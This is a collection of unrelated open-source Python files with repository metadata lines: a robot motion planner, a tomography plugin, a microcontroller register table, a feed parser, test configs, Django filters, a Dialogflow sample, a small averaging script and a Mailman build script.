def extend(self, tree, random_sample, add_intermediates=True, add_tree_step=10):
self._constraints_manager.set_active_tree(tree)
nearest_node = tree.nearest_neighbor(random_sample)
(bConnected, samples) = self.c_free_sampler.interpolate(nearest_node.get_sample_data(), random_sample,
projection_function=self._constraints_manager.project)
parent_node = nearest_node
        self.logger.debug('[RRT::extend] We have ' + str(len(samples) - 1) + " intermediate configurations")
if add_intermediates:
for i in range(add_tree_step, len(samples) - 1, add_tree_step):
parent_node = tree.add(parent_node, samples[i].copy())
if len(samples) > 1:
last_node = tree.add(parent_node, samples[-1].copy())
else:
# self.debugConfigList.extend(samples)
last_node = parent_node
return last_node, bConnected
def pick_nearest_tree(self, sample, backward_trees):
nn = None
dist = float('inf')
tree = None
for treeTemp in backward_trees:
nn_temp = treeTemp.nearest_neighbor(sample)
dist_temp = self.c_free_sampler.distance(sample.get_configuration(),
nn_temp.get_sample_data().get_configuration())
if dist_temp < dist:
dist = dist_temp
nn = nn_temp
tree = treeTemp
return tree, nn
def proximity_birrt(self, start_config, time_limit=60, debug_function=lambda x, y: None,
shortcut_time=5.0, timer_function=time.time):
""" Bidirectional RRT algorithm with hierarchical goal region that
uses free space proximity to bias sampling. """
if not self.c_free_sampler.is_valid(start_config):
self.logger.info('[RRT::proximityBiRRT] Start configuration is invalid. Aborting.')
return None
from sampler import FreeSpaceProximitySampler, FreeSpaceModel, ExtendedFreeSpaceModel
assert type(self.goal_sampler) == FreeSpaceProximitySampler
self.goal_sampler.clear()
self.stats_logger.clear()
self._constraints_manager.clear()
# Create free space memories that our goal sampler needs
connected_free_space = FreeSpaceModel(self.c_free_sampler)
non_connected_free_space = ExtendedFreeSpaceModel(self.c_free_sampler)
self.goal_sampler.set_connected_space(connected_free_space)
self.goal_sampler.set_non_connected_space(non_connected_free_space)
# Create forward tree
forward_tree = RTreeTree(SampleData(start_config), self.c_free_sampler.get_space_dimension(),
self.c_free_sampler.get_scaling_factors())
self._constraints_manager.register_new_tree(forward_tree)
connected_free_space.add_tree(forward_tree)
# Various variable initializations
backward_trees = []
goal_tree_ids = []
b_path_found = False
path = None
b_searching_forward = True
# self.debugConfigList = []
# Start
start_time = timer_function()
debug_function(forward_tree, backward_trees)
# Main loop
self.logger.debug('[RRT::proximityBiRRT] Starting planning loop')
while timer_function() < start_time + time_limit and not b_path_found:
debug_function(forward_tree, backward_trees)
p = random.random()
p_goal = self.p_goal_provider.compute_p_goal(len(backward_trees))
self.logger.debug('[RRT::proximityBiRRT] Rolled a die: ' + str(p) + '. p_goal is ' +
str(p_goal))
if p < p_goal:
# Create a new backward tree
self.logger.debug('[RRT::proximityBiRRT] Sampling a new goal configuration')
goal_sample = self.goal_sampler.sample()
self.stats_logger.num_goals_sampled += 1
self.logger.debug('[RRT::proximityBiRRT] Sampled a new goal: ' + str(goal_sample))
if goal_sample.is_valid():
backward_tree = RTreeTree(goal_sample, self.c_free_sampler.get_space_dimension(),
self.c_free_sampler.get_scaling_factors(), b_forward_tree=False)
self._constraints_manager.register_new_tree(backward_tree)
if self.goal_sampler.is_goal(goal_sample):
self.stats_logger.num_valid_goals_sampled += 1
self.logger.debug('[RRT::proximityBiRRT] Goal sample is valid.' +
' Created new backward tree')
goal_tree_ids.append(backward_tree.get_id())
else:
self.stats_logger.num_approx_goals_sampled += 1
self.logger.debug('[RRT::proximityBiRRT] Goal sample is valid, but approximate.' +
' Created new approximate backward tree')
self.stats_logger.num_backward_trees += 1
backward_trees.append(backward_tree)
non_connected_free_space.add_tree(backward_tree)
else:
# Extend search trees
self.logger.debug('[RRT::proximityBiRRT] Extending search trees')
self._constraints_manager.reset_constraints()
random_sample = self.c_free_sampler.sample()
self.logger.debug('[RRT::proximityBiRRT] Drew random sample: ' + str(random_sample))
self.stats_logger.num_c_free_samples += 1
(forward_node, backward_node, backward_tree, b_connected) = (None, None, None, False)
if b_searching_forward or len(backward_trees) == 0:
self.logger.debug('[RRT::proximityBiRRT] Extending forward tree to random sample')
(forward_node, b_connected) = self.extend(forward_tree, random_sample)
self.logger.debug('[RRT::proximityBiRRT] Forward tree connected to sample: ' + str(b_connected))
self.logger.debug('[RRT::proximityBiRRT] New forward tree node: ' + str(forward_node))
if len(backward_trees) > 0:
self.logger.debug('[RRT::proximityBiRRT] Attempting to connect forward tree ' +
'to backward tree')
(backward_tree, nearest_node) = \
self.pick_nearest_tree(forward_node.get_sample_data(), backward_trees)
(backward_node, b_connected) = self.extend(backward_tree, forward_node.get_sample_data())
else:
b_connected = False
else:
self.logger.debug('[RRT::proximityBiRRT] Extending backward tree to random sample')
# TODO try closest tree instead
backward_tree = self.pick_backward_tree(backward_trees,
goal_tree_ids)
# (backward_tree, nearest_node) = self._biRRT_helper_nearestTree(random_sample, backward_trees)
if backward_tree.get_id() in goal_tree_ids:
self.logger.debug('[RRT::proximityBiRRT] Attempting to connect goal tree!!!!')
(backward_node, b_connected) = self.extend(backward_tree, random_sample)
self.logger.debug('[RRT::proximityBiRRT] New backward tree node: ' + str(backward_node))
self.logger.debug('[RRT::proximityBiRRT] Backward tree connected to sample: ' +
str(b_connected))
self.logger.debug('[RRT::proximityBiRRT] Attempting to connect forward tree ' +
'to backward tree ' + str(backward_tree.get_id()))
(forward_node, b_connected) = self.extend(forward_tree, backward_node.get_sample_data())
self.stats_logger.num_attempted_tree_connects += 1
if b_connected:
self.logger.debug('[RRT::proximityBiRRT] Trees connected')
self.stats_logger.num_successful_tree_connects += 1
tree_name = 'merged_backward_tree' + str(self.stats_logger.num_successful_tree_connects)
self.stats_logger.treeSizes[tree_name] = backward_tree.size()
root_b = forward_tree.merge(forward_node, backward_tree, backward_node)
backward_trees.remove(backward_tree)
non_connected_free_space.remove_tree(backward_tree.get_id())
# Check whether we connected to a goal tree or not
if backward_tree.get_id() in goal_tree_ids:
goal_tree_ids.remove(backward_tree.get_id())
path = forward_tree.extract_path(root_b)
b_path_found = True
self.logger.debug('[RRT::proximityBiRRT] Found a path!')
b_searching_forward = not b_searching_forward
self.stats_logger.treeSizes['forward_tree'] = forward_tree.size()
for bw_tree in backward_trees:
self.stats_logger.treeSizes['unmerged_backward_tree' + str(bw_tree.get_id())] = bw_tree.size()
debug_function(forward_tree, backward_trees)
self.goal_sampler.debug_draw()
self.stats_logger.num_goal_nodes_sampled = self.goal_sampler.get_num_goal_nodes_sampled()
self.stats_logger.runtime = timer_function() - start_time
if path is not None:
self.stats_logger.final_grasp_quality = self.goal_sampler.get_quality(path[-1])
self.stats_logger.success = 1
return self.shortcut(path, shortcut_time)
def pick_backward_tree(self, backward_trees, goal_tree_ids):
p = random.random()
goal_trees = [x for x in backward_trees if x.get_id() in goal_tree_ids]
non_goal_trees = [x for x in backward_trees if x.get_id() not in goal_tree_ids]
if p < self.p_goal_tree and len(goal_tree_ids) > 0:
return random.choice(goal_trees)
elif len(non_goal_trees) > 0:
return random.choice(non_goal_trees)
        elif len(backward_trees) > 0: # this may happen if we have only goal trees, but p >= self.p_goal_tree
return random.choice(backward_trees)
else:
raise ValueError('We do not have any backward trees to pick from')
def shortcut(self, path, time_limit):
if path is None:
return None
self.logger.debug('[RRT::shortcut] Shortcutting path of length %i with time limit %f' % (len(path),
time_limit))
start_time = time.clock()
all_pairs = [(i, j) for i in range(len(path)) for j in range(i + 2, len(path))]
random.shuffle(all_pairs)
while time.clock() < start_time + time_limit and len(all_pairs) > 0:
index_pair = all_pairs.pop()
(bSuccess, samples) = self.c_free_sampler.interpolate(path[index_pair[0]], path[index_pair[1]])
if bSuccess:
path[index_pair[0] + 1:] = path[index_pair[1]:]
all_pairs = [(i, j) for i in range(len(path)) for j in range(i + 2, len(path))]
random.shuffle(all_pairs)
        self.logger.debug('[RRT::shortcut] Shortcutting finished. New path length %i' % len(path))
return path
| kth-ros-pkg/hfts_grasp_planner | src/hfts_grasp_planner/rrt.py | Python | bsd-3-clause | 28,198 | 0.003511 |
import logging
from savu.plugins.base_recon import BaseRecon
from savu.data.process_data import CitationInfomration
from savu.plugins.cpu_plugin import CpuPlugin
import skimage.transform as transform
import numpy as np
from scipy import ndimage
class ScikitimageFilterBackProjection(BaseRecon, CpuPlugin):
"""
A Plugin to reconstruct an image by filter back projection
using the inverse radon transform from scikit-image.
:param output_size: Number of rows and columns in the
reconstruction. Default: None.
:param filter: Filter used in frequency domain filtering
Ramp filter used by default. Filters available: ramp, shepp-logan,
cosine, hamming, hann. Assign None to use no filter. Default: 'ramp'.
:param interpolation: interpolation method used in reconstruction.
Methods available: 'linear', 'nearest', and 'cubic' ('cubic' is slow).
Default: 'linear'.
:param circle: Assume the reconstructed image is zero outside the inscribed
circle. Also changes the default output_size to match the behaviour of
radon called with circle=True. Default: False.
"""
def __init__(self):
logging.debug("initialising Scikitimage Filter Back Projection")
logging.debug("Calling super to make sure that all superclasses are " +
" initialised")
super(ScikitimageFilterBackProjection,
self).__init__("ScikitimageFilterBackProjection")
def _shift(self, sinogram, centre_of_rotation):
centre_of_rotation_shift = (sinogram.shape[0]/2) - centre_of_rotation
return ndimage.interpolation.shift(sinogram,
centre_of_rotation_shift)
def reconstruct(self, sinogram, centre_of_rotation,
angles, shape, center):
print sinogram.shape
sinogram = np.swapaxes(sinogram, 0, 1)
sinogram = self._shift(sinogram, centre_of_rotation)
sino = np.nan_to_num(sinogram)
theta = np.linspace(0, 180, sinogram.shape[1])
result = \
transform.iradon(sino, theta=theta,
output_size=(sinogram.shape[0]),
# self.parameters['output_size'],
filter='ramp', # self.parameters['filter'],
interpolation='linear',
# self.parameters['linear'],
circle=False) # self.parameters[False])
return result
def get_citation_inforamtion(self):
cite_info = CitationInfomration()
cite_info.description = \
("The Tomographic reconstruction performed in this processing " +
"chain is derived from this work.")
cite_info.bibtex = \
("@book{avinash2001principles,\n" +
" title={Principles of computerized tomographic imaging},\n" +
" author={Kak, Avinash C. and Slaney, Malcolm},\n" +
" year={2001},\n" +
" publisher={Society for Industrial and Applied Mathematics}\n" +
"}")
cite_info.endnote = \
("%0 Book\n" +
"%T Principles of computerized tomographic imaging\n" +
"%A Kak, Avinash C.\n" +
"%A Slaney, Malcolm\n" +
"%@ 089871494X\n" +
"%D 2001\n" +
"%I Society for Industrial and Applied Mathematics")
cite_info.doi = "http://dx.doi.org/10.1137/1.9780898719277"
return cite_info
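# --- Illustrative sketch (not part of the original plugin) --------------------
# A framework-free example of the same reconstruction idea: build a sinogram with
# the forward radon transform and invert it with filtered back projection. The
# keyword names follow the older scikit-image API used above; newer releases
# renamed 'filter' to 'filter_name'. The synthetic phantom is purely illustrative.
def _demo_filtered_back_projection():
    yy, xx = np.mgrid[-1:1:128j, -1:1:128j]
    phantom = (xx ** 2 + yy ** 2 < 0.25).astype(np.float64)  # filled disc
    theta = np.linspace(0., 180., 128, endpoint=False)
    sino = transform.radon(phantom, theta=theta, circle=False)
    recon = transform.iradon(sino, theta=theta, filter='ramp',
                             interpolation='linear', circle=False)
    return recon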
| swtp1v07/Savu | savu/plugins/scikitimage_filter_back_projection.py | Python | apache-2.0 | 3,515 | 0 |
# Partname: ATmega644A
# generated automatically, do not edit
MCUREGS = {
'ADCSRB': '&123',
'ADCSRB_ACME': '$40',
'ACSR': '&80',
'ACSR_ACD': '$80',
'ACSR_ACBG': '$40',
'ACSR_ACO': '$20',
'ACSR_ACI': '$10',
'ACSR_ACIE': '$08',
'ACSR_ACIC': '$04',
'ACSR_ACIS': '$03',
'DIDR1': '&127',
'DIDR1_AIN1D': '$02',
'DIDR1_AIN0D': '$01',
'UDR0': '&198',
'UCSR0A': '&192',
'UCSR0A_RXC0': '$80',
'UCSR0A_TXC0': '$40',
'UCSR0A_UDRE0': '$20',
'UCSR0A_FE0': '$10',
'UCSR0A_DOR0': '$08',
'UCSR0A_UPE0': '$04',
'UCSR0A_U2X0': '$02',
'UCSR0A_MPCM0': '$01',
'UCSR0B': '&193',
'UCSR0B_RXCIE0': '$80',
'UCSR0B_TXCIE0': '$40',
'UCSR0B_UDRIE0': '$20',
'UCSR0B_RXEN0': '$10',
'UCSR0B_TXEN0': '$08',
'UCSR0B_UCSZ02': '$04',
'UCSR0B_RXB80': '$02',
'UCSR0B_TXB80': '$01',
'UCSR0C': '&194',
'UCSR0C_UMSEL0': '$C0',
'UCSR0C_UPM0': '$30',
'UCSR0C_USBS0': '$08',
'UCSR0C_UCSZ0': '$06',
'UCSR0C_UCPOL0': '$01',
'UBRR0': '&196',
'PORTA': '&34',
'DDRA': '&33',
'PINA': '&32',
'PORTB': '&37',
'DDRB': '&36',
'PINB': '&35',
'PORTC': '&40',
'DDRC': '&39',
'PINC': '&38',
'PORTD': '&43',
'DDRD': '&42',
'PIND': '&41',
'OCR0B': '&72',
'OCR0A': '&71',
'TCNT0': '&70',
'TCCR0B': '&69',
'TCCR0B_FOC0A': '$80',
'TCCR0B_FOC0B': '$40',
'TCCR0B_WGM02': '$08',
'TCCR0B_CS0': '$07',
'TCCR0A': '&68',
'TCCR0A_COM0A': '$C0',
'TCCR0A_COM0B': '$30',
'TCCR0A_WGM0': '$03',
'TIMSK0': '&110',
'TIMSK0_OCIE0B': '$04',
'TIMSK0_OCIE0A': '$02',
'TIMSK0_TOIE0': '$01',
'TIFR0': '&53',
'TIFR0_OCF0B': '$04',
'TIFR0_OCF0A': '$02',
'TIFR0_TOV0': '$01',
'GTCCR': '&67',
'GTCCR_TSM': '$80',
'GTCCR_PSRSYNC': '$01',
'TIMSK2': '&112',
'TIMSK2_OCIE2B': '$04',
'TIMSK2_OCIE2A': '$02',
'TIMSK2_TOIE2': '$01',
'TIFR2': '&55',
'TIFR2_OCF2B': '$04',
'TIFR2_OCF2A': '$02',
'TIFR2_TOV2': '$01',
'TCCR2A': '&176',
'TCCR2A_COM2A': '$C0',
'TCCR2A_COM2B': '$30',
'TCCR2A_WGM2': '$03',
'TCCR2B': '&177',
'TCCR2B_FOC2A': '$80',
'TCCR2B_FOC2B': '$40',
'TCCR2B_WGM22': '$08',
'TCCR2B_CS2': '$07',
'TCNT2': '&178',
'OCR2B': '&180',
'OCR2A': '&179',
'ASSR': '&182',
'ASSR_EXCLK': '$40',
'ASSR_AS2': '$20',
'ASSR_TCN2UB': '$10',
'ASSR_OCR2AUB': '$08',
'ASSR_OCR2BUB': '$04',
'ASSR_TCR2AUB': '$02',
'ASSR_TCR2BUB': '$01',
'WDTCSR': '&96',
'WDTCSR_WDIF': '$80',
'WDTCSR_WDIE': '$40',
'WDTCSR_WDP': '$27',
'WDTCSR_WDCE': '$10',
'WDTCSR_WDE': '$08',
'OCDR': '&81',
'MCUCR': '&85',
'MCUCR_JTD': '$80',
'MCUSR': '&84',
'MCUSR_JTRF': '$10',
'SPMCSR': '&87',
'SPMCSR_SPMIE': '$80',
'SPMCSR_RWWSB': '$40',
'SPMCSR_SIGRD': '$20',
'SPMCSR_RWWSRE': '$10',
'SPMCSR_BLBSET': '$08',
'SPMCSR_PGWRT': '$04',
'SPMCSR_PGERS': '$02',
'SPMCSR_SPMEN': '$01',
'EICRA': '&105',
'EICRA_ISC2': '$30',
'EICRA_ISC1': '$0C',
'EICRA_ISC0': '$03',
'EIMSK': '&61',
'EIMSK_INT': '$07',
'EIFR': '&60',
'EIFR_INTF': '$07',
'PCMSK3': '&115',
'PCMSK3_PCINT': '$FF',
'PCMSK2': '&109',
'PCMSK2_PCINT': '$FF',
'PCMSK1': '&108',
'PCMSK1_PCINT': '$FF',
'PCMSK0': '&107',
'PCMSK0_PCINT': '$FF',
'PCIFR': '&59',
'PCIFR_PCIF': '$0F',
'PCICR': '&104',
'PCICR_PCIE': '$0F',
'ADMUX': '&124',
'ADMUX_REFS': '$C0',
'ADMUX_ADLAR': '$20',
'ADMUX_MUX': '$1F',
'ADC': '&120',
'ADCSRA': '&122',
'ADCSRA_ADEN': '$80',
'ADCSRA_ADSC': '$40',
'ADCSRA_ADATE': '$20',
'ADCSRA_ADIF': '$10',
'ADCSRA_ADIE': '$08',
'ADCSRA_ADPS': '$07',
'DIDR0': '&126',
'DIDR0_ADC7D': '$80',
'DIDR0_ADC6D': '$40',
'DIDR0_ADC5D': '$20',
'DIDR0_ADC4D': '$10',
'DIDR0_ADC3D': '$08',
'DIDR0_ADC2D': '$04',
'DIDR0_ADC1D': '$02',
'DIDR0_ADC0D': '$01',
'TIMSK1': '&111',
'TIMSK1_ICIE1': '$20',
'TIMSK1_OCIE1B': '$04',
'TIMSK1_OCIE1A': '$02',
'TIMSK1_TOIE1': '$01',
'TIFR1': '&54',
'TIFR1_ICF1': '$20',
'TIFR1_OCF1B': '$04',
'TIFR1_OCF1A': '$02',
'TIFR1_TOV1': '$01',
'TCCR1A': '&128',
'TCCR1A_COM1A': '$C0',
'TCCR1A_COM1B': '$30',
'TCCR1A_WGM1': '$03',
'TCCR1B': '&129',
'TCCR1B_ICNC1': '$80',
'TCCR1B_ICES1': '$40',
'TCCR1B_WGM1': '$18',
'TCCR1B_CS1': '$07',
'TCCR1C': '&130',
'TCCR1C_FOC1A': '$80',
'TCCR1C_FOC1B': '$40',
'TCNT1': '&132',
'OCR1A': '&136',
'OCR1B': '&138',
'ICR1': '&134',
'EEAR': '&65',
'EEDR': '&64',
'EECR': '&63',
'EECR_EEPM': '$30',
'EECR_EERIE': '$08',
'EECR_EEMPE': '$04',
'EECR_EEPE': '$02',
'EECR_EERE': '$01',
'TWAMR': '&189',
'TWAMR_TWAM': '$FE',
'TWBR': '&184',
'TWCR': '&188',
'TWCR_TWINT': '$80',
'TWCR_TWEA': '$40',
'TWCR_TWSTA': '$20',
'TWCR_TWSTO': '$10',
'TWCR_TWWC': '$08',
'TWCR_TWEN': '$04',
'TWCR_TWIE': '$01',
'TWSR': '&185',
'TWSR_TWS': '$F8',
'TWSR_TWPS': '$03',
'TWDR': '&187',
'TWAR': '&186',
'TWAR_TWA': '$FE',
'TWAR_TWGCE': '$01',
'UDR1': '&206',
'UCSR1A': '&200',
'UCSR1A_RXC1': '$80',
'UCSR1A_TXC1': '$40',
'UCSR1A_UDRE1': '$20',
'UCSR1A_FE1': '$10',
'UCSR1A_DOR1': '$08',
'UCSR1A_UPE1': '$04',
'UCSR1A_U2X1': '$02',
'UCSR1A_MPCM1': '$01',
'UCSR1B': '&201',
'UCSR1B_RXCIE1': '$80',
'UCSR1B_TXCIE1': '$40',
'UCSR1B_UDRIE1': '$20',
'UCSR1B_RXEN1': '$10',
'UCSR1B_TXEN1': '$08',
'UCSR1B_UCSZ12': '$04',
'UCSR1B_RXB81': '$02',
'UCSR1B_TXB81': '$01',
'UCSR1C': '&202',
'UCSR1C_UMSEL1': '$C0',
'UCSR1C_UPM1': '$30',
'UCSR1C_USBS1': '$08',
'UCSR1C_UCSZ1': '$06',
'UCSR1C_UCPOL1': '$01',
'UBRR1': '&204',
'SPDR': '&78',
'SPSR': '&77',
'SPSR_SPIF': '$80',
'SPSR_WCOL': '$40',
'SPSR_SPI2X': '$01',
'SPCR': '&76',
'SPCR_SPIE': '$80',
'SPCR_SPE': '$40',
'SPCR_DORD': '$20',
'SPCR_MSTR': '$10',
'SPCR_CPOL': '$08',
'SPCR_CPHA': '$04',
'SPCR_SPR': '$03',
'SREG': '&95',
'SREG_I': '$80',
'SREG_T': '$40',
'SREG_H': '$20',
'SREG_S': '$10',
'SREG_V': '$08',
'SREG_N': '$04',
'SREG_Z': '$02',
'SREG_C': '$01',
'SP': '&93',
'OSCCAL': '&102',
'CLKPR': '&97',
'CLKPR_CLKPCE': '$80',
'CLKPR_CLKPS': '$0F',
'SMCR': '&83',
'SMCR_SM': '$0E',
'SMCR_SE': '$01',
'GPIOR2': '&75',
'GPIOR2_GPIOR': '$FF',
'GPIOR1': '&74',
'GPIOR1_GPIOR': '$FF',
'GPIOR0': '&62',
'GPIOR0_GPIOR07': '$80',
'GPIOR0_GPIOR06': '$40',
'GPIOR0_GPIOR05': '$20',
'GPIOR0_GPIOR04': '$10',
'GPIOR0_GPIOR03': '$08',
'GPIOR0_GPIOR02': '$04',
'GPIOR0_GPIOR01': '$02',
'GPIOR0_GPIOR00': '$01',
'PRR0': '&100',
'PRR0_PRTWI': '$80',
'PRR0_PRTIM2': '$40',
'PRR0_PRTIM0': '$20',
'PRR0_PRUSART': '$12',
'PRR0_PRTIM1': '$08',
'PRR0_PRSPI': '$04',
'PRR0_PRADC': '$01',
'INT0Addr': '2',
'INT1Addr': '4',
'INT2Addr': '6',
'PCINT0Addr': '8',
'PCINT1Addr': '10',
'PCINT2Addr': '12',
'PCINT3Addr': '14',
'WDTAddr': '16',
'TIMER2_COMPAAddr': '18',
'TIMER2_COMPBAddr': '20',
'TIMER2_OVFAddr': '22',
'TIMER1_CAPTAddr': '24',
'TIMER1_COMPAAddr': '26',
'TIMER1_COMPBAddr': '28',
'TIMER1_OVFAddr': '30',
'TIMER0_COMPAAddr': '32',
'TIMER0_COMPBAddr': '34',
'TIMER0_OVFAddr': '36',
'SPI__STCAddr': '38',
'USART0__RXAddr': '40',
'USART0__UDREAddr': '42',
'USART0__TXAddr': '44',
'ANALOG_COMPAddr': '46',
'ADCAddr': '48',
'EE_READYAddr': '50',
'TWIAddr': '52',
'SPM_READYAddr': '54',
'USART1_RXAddr': '56',
'USART1_UDREAddr': '58',
'USART1_TXAddr': '60'
} | hickey/amforth | core/devices/atmega644a/device.py | Python | gpl-2.0 | 7,375 | 0.071458 |
def extractWhatzombiesfearCom(item):
'''
Parser for 'whatzombiesfear.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
| fake-name/ReadableWebProxy | WebMirror/management/rss_parser_funcs/feed_parse_extractWhatzombiesfearCom.py | Python | bsd-3-clause | 551 | 0.034483 |
distributable = FastLmmSet(
phenofile = 'datasets/phenSynthFrom22.23.bin.N30.txt',
alt_snpreader = 'datasets/all_chr.maf0.001.N30',
altset_list = 'datasets/set_input.23_17_11.txt',
covarfile = None,
filenull = None,
autoselect = False,
mindist = 0,
idist=2,
nperm = 10,
test="lrt",
nullfit="qq", #use quantile-quantile fit to estimate params of null distribution
outfile = 'tmp/lrt_one_kernel_mixed_effect_laplace_l2_logistic_qqfit.N30.txt',
forcefullrank=False,
qmax=0.1, #use the top 10% of null distrib test statistics to fit the null distribution
write_lrtperm=True,
datestamp=None,
nullModel={'effect':'mixed', 'link':'logistic',
'approx':'laplace', 'penalty':'l2'},
altModel={'effect':'mixed', 'link':'logistic',
'approx':'laplace', 'penalty':'l2'},
log = logging.CRITICAL,
detailed_table = False
)
| MicrosoftGenomics/FaST-LMM | tests/inputs/buggy/lrt_one_kernel_mixed_effect_laplace_l2_logistic_qqfit.N30.py | Python | apache-2.0 | 956 | 0.041841 |
##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2019 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
import django_filters
from django.forms import TextInput
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
from rest_framework import serializers
from base.models.entity_version import EntityVersion
class EntityVersionFilter(django_filters.FilterSet):
acronym = django_filters.CharFilter(
lookup_expr='icontains', label=_("Acronym"),
widget=TextInput(attrs={'style': "text-transform:uppercase"})
)
title = django_filters.CharFilter(lookup_expr='icontains', label=_("Title"), )
class Meta:
model = EntityVersion
fields = ["entity_type"]
class EntityListSerializer(serializers.Serializer):
acronym = serializers.CharField()
title = serializers.CharField()
entity_type = serializers.CharField()
# Display human readable value
entity_type_text = serializers.CharField(source='get_entity_type_display', read_only=True)
organization = serializers.SerializerMethodField()
select_url = serializers.SerializerMethodField()
def get_organization(self, obj):
return str(obj.entity.organization)
def get_select_url(self, obj):
return reverse(
"entity_read",
kwargs={'entity_version_id': obj.id}
)
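# --- Illustrative usage (not part of the original module) ---------------------
# Minimal sketch of combining the filter and serializer above, for example in a
# view or autocomplete endpoint. The request/queryset wiring is an assumption for
# illustration; the project code that actually uses these classes is not shown.
def _entity_search_example(request):
    entity_filter = EntityVersionFilter(request.GET,
                                        queryset=EntityVersion.objects.all())
    serializer = EntityListSerializer(entity_filter.qs, many=True)
    return serializer.data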
| uclouvain/osis | base/forms/entity.py | Python | agpl-3.0 | 2,540 | 0.001182 |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for DeleteDocument
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dialogflow
# [START dialogflow_generated_dialogflow_v2_Documents_DeleteDocument_async]
from google.cloud import dialogflow_v2
async def sample_delete_document():
# Create a client
client = dialogflow_v2.DocumentsAsyncClient()
# Initialize request argument(s)
request = dialogflow_v2.DeleteDocumentRequest(
name="name_value",
)
# Make the request
operation = client.delete_document(request=request)
print("Waiting for operation to complete...")
response = await operation.result()
# Handle the response
print(response)
# [END dialogflow_generated_dialogflow_v2_Documents_DeleteDocument_async]
| googleapis/python-dialogflow | samples/generated_samples/dialogflow_generated_dialogflow_v2_documents_delete_document_async.py | Python | apache-2.0 | 1,580 | 0.000633 |
count = 0
total = 0
average = 0
while True:
inputNumber = raw_input('Enter a number : ')
# Edge Cases
if inputNumber == 'done':
break
if len(inputNumber) < 1:
break
# Logical work
try:
number = float(inputNumber)
except:
print 'Invalid Number'
continue
count = count + 1
total = total + number
print 'Count Total\n', count, total
average = total / count
print average
| rahulbohra/Python-Basic | 35_sum_count_avg_by_user_input.py | Python | mit | 454 | 0.002203 |
#! /usr/bin/python
#
# Copyright 2009, 2010 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
import errno
import grp
import os
import pwd
import socket
import subprocess
import sys
import tempfile
from lazr.config import as_username_groupname
from lp.services.config import config
from lp.services.mailman.config import (
configure_prefix,
configure_siteowner,
)
from lp.services.mailman.monkeypatches import monkey_patch
basepath = [part for part in sys.path if part]
def build_mailman():
# Build and install Mailman if it is enabled and not yet built.
if not config.mailman.build:
# There's nothing to do.
return 0
mailman_path = configure_prefix(config.mailman.build_prefix)
mailman_bin = os.path.join(mailman_path, 'bin')
var_dir = os.path.abspath(config.mailman.build_var_dir)
# If we can import the package, we assume Mailman is properly built at
# the least. This does not catch re-installs that might be necessary
# should our copy in sourcecode be updated. Do that manually.
sys.path.append(mailman_path)
try:
import Mailman
except ImportError:
# sys.path_importer_cache is a mapping of elements of sys.path to
# importer objects used to handle them. In Python2.5+ when an element
# of sys.path is found to not exist on disk, a NullImporter is created
# and cached - this causes Python to never bother re-inspecting the
# disk for that path element. We must clear that cache element so that
# our second attempt to import MailMan after building it will actually
# check the disk.
del sys.path_importer_cache[mailman_path]
need_build = need_install = True
else:
need_build = need_install = False
# Also check for Launchpad-specific bits stuck into the source tree by
# monkey_patch(), in case this is half-installed. See
# <https://bugs.launchpad.net/launchpad-registry/+bug/683486>.
try:
from Mailman.Queue import XMLRPCRunner
from Mailman.Handlers import LPModerate
except ImportError:
# Monkey patches not present, redo install and patch steps.
need_install = True
# Make sure the target directories exist and have the correct
# permissions, otherwise configure will complain.
user, group = as_username_groupname(config.mailman.build_user_group)
# Now work backwards to get the uid and gid
try:
uid = pwd.getpwnam(user).pw_uid
except KeyError:
print >> sys.stderr, 'No user found:', user
sys.exit(1)
try:
gid = grp.getgrnam(group).gr_gid
except KeyError:
print >> sys.stderr, 'No group found:', group
sys.exit(1)
# Ensure that the var_dir exists, is owned by the user:group, and has
# the necessary permissions. Set the mode separately after the
# makedirs() call because some platforms ignore mkdir()'s mode (though
# I think Linux does not ignore it -- better safe than sorry).
try:
os.makedirs(var_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
else:
# Just created the var directory, will need to install mailmain bits.
need_install = True
os.chown(var_dir, uid, gid)
os.chmod(var_dir, 02775)
# Skip mailman setup if nothing so far has shown a reinstall needed.
if not need_install:
return 0
mailman_source = os.path.join('sourcecode', 'mailman')
if config.mailman.build_host_name:
build_host_name = config.mailman.build_host_name
else:
build_host_name = socket.getfqdn()
# Build and install the Mailman software. Note that we don't care about
# --with-cgi-gid because we're not going to use that Mailman subsystem.
executable = os.path.abspath('bin/py')
configure_args = (
'./configure',
'--prefix', mailman_path,
'--with-var-prefix=' + var_dir,
'--with-python=' + executable,
'--with-username=' + user,
'--with-groupname=' + group,
'--with-mail-gid=' + group,
'--with-mailhost=' + build_host_name,
'--with-urlhost=' + build_host_name,
)
if need_build:
# Configure.
retcode = subprocess.call(configure_args, cwd=mailman_source)
if retcode:
